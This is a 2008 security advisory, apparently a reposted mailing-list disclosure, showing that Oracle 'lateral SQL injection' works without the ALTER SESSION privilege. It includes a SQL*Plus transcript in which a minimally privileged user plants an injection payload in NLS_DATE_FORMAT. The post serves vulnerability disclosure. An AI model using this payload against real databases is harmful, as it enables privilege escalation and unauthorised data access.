Lateral SQL Injection Revisited - No Special Privs Required

2008-07-19T00:00:00
ID SECURITYVULNS:DOC:20187
Type securityvulns
Reporter Securityvulns
Modified 2008-07-19T00:00:00

Description

At the end of April 2008 I published a paper about a new class of flaw in Oracle entitled "Lateral SQL Injection".

The paper can be found here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

Essentially the paper details a way in which the attacker can manipulate the environment to trick an Oracle database into using arbitrary SQL in DATE functions and data.

A number of people at the time dismissed it as irrelevant because the attacker required the ALTER SESSIOn privilege. Well, as it turns out, you don't need the ALTER SESSION privilege at all. Here's why: there are certain ALTER SESSION statements that can be executed even though the user doesn't have the ALTER SESSION privilege. The statements that can be executed without the privilege include those that relate to National Language Support. Thus a user without ALTER SESSION privileges can change the date format and so employ a lateral SQL injection attack. The script below shows this in action. We connect to a fully patched 11g server and confirm we only have CREATE SESSION privileges - i.e. the minimum we need to connect to the server - everyone gets this privilege. We then issue an ALTER SESSION statement to try set SQL_TRACE to true. As expected this fails with an insufficient privileges error. But then we issues an ALTER SESSION to set the NLS_DATE_FORMAT and this succeeds. Lastly we call the SYSDATE function to confirm it took.

C:\>sqlplus /nolog

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Jul 18 14:47:17 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.

SQL> connect testuser1/testuser1 Connected. SQL> select * from session_privs;

PRIVILEGE

CREATE SESSION

SQL> alter session set sql_trace = true; alter session set sql_trace = true * ERROR at line 1: ORA-01031: insufficient privileges

SQL> alter session set nls_date_format='"'' and myfunc()=1--"';

Session altered.

SQL> select sysdate from dual;

SYSDATE

' and myfunc()=1--

SQL>

Thus we can see that no special privileges are required to effect a lateral SQL injection attack. I suppose I should have spotted this at the time. Cheers, David

-- E-MAIL DISCLAIMER

The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402